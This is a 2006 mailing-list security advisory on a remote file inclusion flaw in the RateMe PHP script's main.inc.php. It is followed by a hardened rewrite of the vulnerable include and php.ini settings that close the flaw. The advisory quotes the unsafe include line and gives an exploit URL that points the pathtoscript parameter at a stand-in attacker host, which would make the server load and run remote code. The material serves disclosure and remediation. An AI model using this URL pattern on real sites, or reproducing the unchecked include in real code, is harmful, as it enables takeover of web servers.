[Full-disclosure] RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
- From: "saudi arabia" <saudi@xxxxxxxxxx>
- Date: Mon, 18 Dec 2006 11:34:34 +0000
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Contact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
# Description :
# File infected : main.inc.php , line 17
#
# echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <==
#
# Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
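
A hardened form of the include quoted in the advisory, added here as an example; it is not RateMe's code and not the advisory author's. It assumes `$pathtoscript` can be set from the query string because the script uses it without initializing it, as the advisory's URL implies. `rateme_base()`, `rateme_path()` and `RATEME_ALLOWED` are hypothetical names, and the demo at the end runs against a constructed stub file.

```php
<?php
// Added example, not RateMe's code. rateme_base(), rateme_path() and
// RATEME_ALLOWED are hypothetical names.
// Before (main.inc.php line 17, as quoted in the advisory):
//   include($pathtoscript.'db_connect.inc.php');

// Files this script may include, by exact name.
const RATEME_ALLOWED = ['db_connect.inc.php'];

// Validate a base directory that comes from server-side config or __DIR__.
function rateme_base(string $dir): string
{
    // Reject URL-style values explicitly so the error is clear.
    if (strpos($dir, '://') !== false) {
        throw new InvalidArgumentException('URL not accepted as include base');
    }
    $real = realpath($dir); // resolves local paths only
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('include base is not a local directory');
    }
    return $real . DIRECTORY_SEPARATOR;
}

// Resolve an allowlisted file under the validated base.
function rateme_path(string $base, string $file): string
{
    if (!in_array($file, RATEME_ALLOWED, true)) {
        throw new InvalidArgumentException('file is not on the include allowlist');
    }
    $real = realpath($base . $file);
    if ($real === false || strpos($real, $base) !== 0) {
        throw new RuntimeException('include target missing or outside base');
    }
    return $real;
}

// After: refuse any request that tries to supply the variable at all.
if (isset($_REQUEST['pathtoscript'])) {
    http_response_code(400);
    exit('bad request');
}

// Demo on a constructed stub; in main.inc.php the base would be __DIR__.
$demo = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rateme_demo_' . getmypid();
is_dir($demo) || mkdir($demo);
file_put_contents($demo . DIRECTORY_SEPARATOR . 'db_connect.inc.php', "<?php // constructed stub\n");
$pathtoscript = rateme_base($demo);
require rateme_path($pathtoscript, 'db_connect.inc.php');
echo "included db_connect.inc.php from $pathtoscript\n";
```

Independently of the code change, `register_globals = Off` and `allow_url_include = Off` in php.ini close the same path at the interpreter level.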